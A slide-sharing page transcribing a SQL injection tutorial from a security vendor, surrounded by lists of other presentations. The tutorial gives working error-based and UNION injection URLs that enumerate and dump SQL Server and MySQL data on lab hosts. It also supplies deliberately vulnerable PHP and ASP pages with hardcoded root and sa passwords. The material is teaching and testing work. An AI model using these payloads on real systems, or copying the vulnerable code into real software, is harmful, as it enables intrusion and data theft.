AppSec DC 2009 - Learning by breaking by Chuck WillisAppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck WillisMagno Logan
 
Just4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applicationsJust4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applicationsMagno Logan
 
GTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguroGTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguroMagno Logan
 
ENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na WebENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na WebMagno Logan
 
BHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applicationsBHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applicationsMagno Logan
 
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEAppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEMagno Logan
 

More from Magno Logan (20)

DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
 
Katana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da InformaçãoKatana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da Informação
 
OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
 
OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
 
OWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BROWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BR
 
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner EliasTratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
 
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
 
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
 
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon BennettsAppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
 
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
 
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
 
AppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck WillisAppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck Willis
 
Just4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applicationsJust4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applications
 
GTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguroGTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguro
 
ENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na WebENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na Web
 
BHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applicationsBHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applications
 
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEAppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
 

Recently uploaded

Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 

Recently uploaded (20)

Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 

SQL Injection Tutorial

  • 1. SQL Injection Tutorial SQL Injection Tutorial Table of Content 1 What is SQL Injection...............................................................................................................2 2 SQL Injection Tutorial..............................................................................................................2 2.1 Get Environment Information ..........................................................................................2 2.1.1 Injectable or Not?.........................................................................................................2 2.1.2 Get SQL Injection KeyWord........................................................................................5 2.1.3 Get Database Type .......................................................................................................6 2.1.4 Method of Getting Data................................................................................................7 2.2 Get Data by SQL Injection...............................................................................................8 2.2.1 Get Dabase Name.........................................................................................................8 2.2.2 Get Table Name .........................................................................................................11 2.2.3 Get Column Name......................................................................................................12 2.2.4 Get Data Record.........................................................................................................14 2.3 SQL Injection Tool.........................................................................................................15 3 Build Typical Test Environment.............................................................................................17 3.1 PHP+MySQL Test Environment....................................................................................17 3.2 ASP/ASPX+SQL Server Test Environment ..................................................................19 4 References...............................................................................................................................21 By Janus Security Software (http://www.janusec.com/ )
  • 2. SQL Injection Tutorial 1 What is SQL Injection SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL Injection is one of the most common application layer attack techniques used today. 2 SQL Injection Tutorial If you have no pages with SQL Injection vulnerability for test, please built one of your own according to chapter 3 – Build Typical Test Environment. Here let‟s begin our SQL Injection Tutorial. 2.1 Get Environment Information Example 1: http://192.168.254.21:79/sql.asp?uid=1 Example 2: http://192.168.254.21/mysql.php?username=bob You can get it in chapter 3 – Build Typical Test Environment. 2.1.1 Injectable or Not? Example 1: (1)Normal Request and named Response0 for the result: http://192.168.254.21:79/sql.asp?uid=1
  • 3. SQL Injection Tutorial (2) Add true condition (1=1) and named Response1 for the result: http://192.168.254.21:79/sql.asp?uid=1 and 1=1 (3) Add false condition (1=2) and named Response2 for the result: http://192.168.254.21:79/sql.asp?uid=1 and 1=2 Usually, if Response1=Response0 And Response1! = Response2, It means there is SQL Injection vulnerability. Example 2:
  • 4. SQL Injection Tutorial Response0: http://192.168.254.21/mysql.php?username=bob Response1: Response1 is not equal to Response0, notice that bob is a string, not an integer, so try: Response1: http://192.168.254.21/mysql.php?username=bob' and '1'='1 Now Response1 is equal to Response0, continue: Response2: http://192.168.254.21/mysql.php?username=bob' and '1'='2
  • 5. SQL Injection Tutorial Response1=Response0 And Response1! = Response2, It means there is SQL Injection vulnerability. In some cases, even the parameter is an integer, it need a single quote to match the SQL sentence. 2.1.2 Get SQL Injection KeyWord SQL Injection Keyword is a word or phrase that only occurred in Response1 but not occurred in Response2. SQL Injection Keyword used by SQL Injection Scanners, for example WebCruiser Web Vulnerability Scanner (http://sec4app.com/ ). In example 1 and example 2, the keyword may be username, Description etc.
  • 6. SQL Injection Tutorial In the following SQL Injection process, if Response1 include the keyword but Response2 not, we can judge that the response1 using a true condition. 2.1.3 Get Database Type Sometimes, you can simply get the database type by add a single quote to produce an error: http://192.168.254.21:79/sql.asp?uid=1' http://192.168.254.21/mysql.php?username=bob' But usually, you need use database specified syntax to get the type, it becomes complex. Or you can use a SQL Injection Scanner to do it. In example 1, try to get database name by: http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
  • 7. SQL Injection Tutorial db_name() is a function of SQL Server, but not include in MySQL, http://192.168.254.21/mysql.php?username=bob'and db_name()>0 and '1'='1 Try: http://192.168.254.21/mysql.php?username=bob' and (select length(user()))>0 and '1'='1 Because (select length(user())) is valid in MySQL, so we can guess it is using MySQL. 2.1.4 Method of Getting Data There are many methods to getting data in SQL Injection, but not all these methods are supported in an actual penetration test. These methods include:  Plain text error (To produce an error and get information from the error message);  Union replace (Using null union select column from table to replace the response);  Blind SQL Injection (Using ASCII comparison when no error message response);  Cross-site SQL Injection (To send the information to a third site);
  • 8. SQL Injection Tutorial  Time delay (To produce time-consuming SQL sentence and get information from the response time). In example 1, response of http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0 include the database name “test”, so you can get data by plain text error. In example 2, response of http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select char(65,65,65),1%23 include “AAA” (char(65,65,65)), so you can get data by Union replace. 2.2 Get Data by SQL Injection 2.2.1 Get Dabase Name Example 1: Get Current Database: http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
  • 9. SQL Injection Tutorial Get All Databases: Get Database Number: 10 http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [master]..[sysdatabases]) as varchar(8))))>0 Get each database name: master, tempdb, etc. by changing the value of dbid. http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases] where dbid=1))>0 http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases] where dbid=2))>0 Example 2:
  • 10. SQL Injection Tutorial Get Current Database: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select database(),1 %23 Get All Databases: Get databases number: 18 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(SCHEMA_NAME) from information_schema.SCHEMATA) as char)),1 %23 Get each database: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select SCHEMA_NAME,1 from information_schema.SCHEMATA limit 0,1%23 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select SCHEMA_NAME,1 from information_schema.SCHEMATA limit 17,1%23
  • 11. SQL Injection Tutorial 2.2.2 Get Table Name Example 1: Get Table Number: 6 http://192.168.254.21:79/sql.asp?uid=1 and char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [Test]..[sysobjects] where xtype=0x55) as varchar(8)))>0 Get each table: http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 1 id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0 … http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 4 id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0 Example 2: Get Table Number: 5 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=char(116,101,115,116)) as
  • 12. SQL Injection Tutorial char)),1 %23 Get each table: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select TABLE_NAME,1 from information_schema.tables where TABLE_SCHEMA=char(116,101,115,116) limit 2,1%23 2.2.3 Get Column Name Example 1, Get Column Number of table „t1‟: 3 http://192.168.254.21:79/sql.asp?uid=1 and char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [Test].information_schema.columns where table_name=0x74003100) as varchar(8)))>0
  • 13. SQL Injection Tutorial Get each column: http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from [Test].information_schema.columns where table_name=0x74003100 and ordinal_position=1)>0 http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from [Test].information_schema.columns where table_name=0x74003100 and ordinal_position=2)>0 Example 2: Get column number: 2 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=char(116,101,115,116) and TABLE_NAME=char(116,49)) as char)),1 %23
  • 14. SQL Injection Tutorial Get each column: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select COLUMN_NAME,1 from information_schema.COLUMNS where TABLE_SCHEMA=char(116,101,115,116) and TABLE_NAME=char(116,49) limit 0,1%23 2.2.4 Get Data Record Example 1, http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 isnull(cast([username] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32)) from (select top 1 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by [username] desc)>0
  • 15. SQL Injection Tutorial http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 isnull(cast([username] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32)) from (select top 2 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by [username] desc)>0 Example 2: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat_ws(char(94),ifnull(cast(`user` as char),char(32)),ifnull(cast(`des` as char),char(32))),1 from test.t1 limit 4,1%23 2.3 SQL Injection Tool This SQL Injection Tutorial describes how to use SQL Injection manually, but it is inefficient step by step. An automatic SQL Injection Scanner and SQL Injection Tool are preferred. WebCruiser Web Vulnerability Scanner is such an effective penetration testing tool for you.
  • 16. SQL Injection Tutorial WebCruiser - Web Vulnerability Scanner, an effective and powerful web penetration testing tool that will aid you in auditing your website! It has a Vulnerability Scanner and a series of security tools include SQL Injection Tool, Cross Site Scripting Tool, XPath Injection Tool etc. WebCruiser can support scanning website as well as POC (Proof of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, an XPath injection tool, and a Cross Site Scripting tool! Key Features: * Crawler (Site Directories and Files); * Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.; * SQL Injection Scanner; * SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept); * SQL Injection for SQL Server: PlainText/Union/Blind Injection; * SQL Injection for MySQL: PlainText/Union/Blind Injection; * SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection; * SQL Injection for DB2: Union/Blind Injection;
  • 17. SQL Injection Tutorial * SQL Injection for Access: Union/Blind Injection; * Post Data Resend; * Cross Site Scripting Scanner and POC; * XPath Injection Scanner and POC; * Auto Get Cookie From Web Browser For Authentication; * Report Output. System Requirement: Windows 7/Vista, or Windows XP with .Net Framework 2.0 Download WebCruiser from http://sec4app.com or http://www.janusec.com . 3 Build Typical Test Environment 3.1 PHP+MySQL Test Environment XAMPP (http://sourceforge.net/projects/xampp/) will help you build a PHP+MySQL environment simply. Create database `test` and table `t1` and add records, here is the description:
  • 18. SQL Injection Tutorial Create a file named mysql.php: <?php $username=$_GET['username']; if($username) { $conn=mysql_connect("127.0.0.1","root","123456") or die('Error: ' . mysql_error()); mysql_select_db("test"); $SQL="select * from t1 where user='".$username."'"; //echo "SQL=".$SQL."<br>"; $result=mysql_query($SQL) or die('Error: ' . mysql_error());; $row=mysql_fetch_array($result); if($row['user']) { echo "Username:".$row['user']."<br>"; echo "Description:".$row['des']."<br>"; echo "TestOK!<br>"; } else echo "No Record!"; mysql_free_result($result); mysql_close(); } ?> Place mysql.php to the folder htdocs and navigate
  • 19. SQL Injection Tutorial http://192.168.254.21/mysql.php?username=bob 3.2 ASP/ASPX+SQL Server Test Environment Create database test and table t1: Create sql.asp: <script language=javascript runat=server> var dbConn = Server.CreateObject("ADODB.Connection"); dbConn.open("Provider=sqloledb;Data Source=localhost;Initial Catalog=test;User Id=sa;Password=123456;" ); rs = Server.CreateObject("ADODB.RecordSet"); uid= Request.Querystring("uid"); rs.open("select * from t1 where uid="+uid,dbConn,3); Response.write("<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>Test</title></head>"); if(rs.RecordCount < 1) { Response.write("<p>No Record!</p>"); } else {
  • 20. SQL Injection Tutorial Response.write("<table border=1 width=800 cellspacing=0 bordercolordark=009099>"); Response.write("<tr><td><b>uid</b></td><td><b>username</b></td><td><b>Description</b></td>"); for(var i = 1;i <= rs.RecordCount;i++) { if(!rs.Eof) { Response.write("<tr>"); Response.write("<td><span style='font-size:9t'>"+rs("uid")+"</span></td>"); Response.write("<td><span style='font-size:9t'>"+rs("username")+"</span></td>"); Response.write("<td><span style='font-size:9t'>"+rs("des")+"</span></td>"); Response.write("</tr>"); rs.MoveNext(); } } } Response.write("</html>"); rs.close(); dbConn.close(); </script> Navigate http://192.168.254.21:79/sql.asp?uid=1
  • 21. SQL Injection Tutorial 4 References 1. SQL Injection, http://sec4app.com/download/SqlInjection.pdf 2. WebCruiser Web Vulnerability Scanner User Guide, http://sec4app.com/download/WebCruiserUserGuide.pdf 3. Janus Security Software, http://www.janusec.com/ 4. WebCruiser, http://sec4app.com/